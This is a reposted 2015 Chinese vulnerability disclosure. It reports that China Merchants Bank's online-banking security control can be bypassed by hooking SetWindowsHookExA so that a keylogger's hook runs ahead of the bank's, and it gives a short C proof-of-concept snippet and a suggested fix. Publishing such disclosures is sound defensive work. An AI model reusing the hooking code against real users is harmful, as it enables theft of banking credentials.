记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

招商银行网银安全控件可被绕过

2015-07-06 02:20

招商银行个人网银安全控件设计缺陷,可轻松绕过其对键盘记录器的防护。

配合之前爆出的安全控件修改IE设置的缺陷可导致任意ActiveX加载,实现远程利用。

详细内容见证明。

漏洞证明:

招行控件设计挺不错,但还是有少许不足。



控件利用windows的消息钩子机制,控件在激活时挂钩了WH_GETMESSAGE,WH_KEYBOARD和WH_KEYBOARD_LL三个消息,并且采用循环挂钩摘钩的方法保证自己的钩子在链表的第一位,对键盘记录有较强的对抗能力。

招行.png





但在实际中,挂钩消息是调用API函数SetWindowsHookExA完成,由于控件没有检测API是否被修改,通过APIHOOK技术可以修改SetWindowsHookExA做到将恶意的钩子置于链表顶部。

code 区域
HHOOK WINAPI My_SetWindowsHookExA(int idHook, HOOKPROC lpfn, HINSTANCE hMod, DWORD dwThreadId)

{

HHOOK ret = SysSetWindowsHookExA(idHook, lpfn, hMod, dwThreadId);

if (idHook == WH_KEYBOARD || idHook == WH_KEYBOARD_LL)

{

if (!myhook)

{

SysUnhookWindowsHookEx(myhook);

myhook = NULL;

}

bankhook = ret;

myhook = SysSetWindowsHookExA(WH_KEYBOARD_LL, KeyboardProc, hMod, 0);

}

return ret;

}



确保了自己的hook位于链表顶部也就意味着可以先于控件截获键盘消息,于是:

(图中每次按键被记录了两次是由于demo同时下了两个钩子,无视这些细节就好~)

招行1.png

修复方案:

调用API前检查函数入口是否被修改

知识来源: www.wooyun.org/bugs/wooyun-2015-0114940

阅读:121530 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“招商银行网银安全控件可被绕过”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云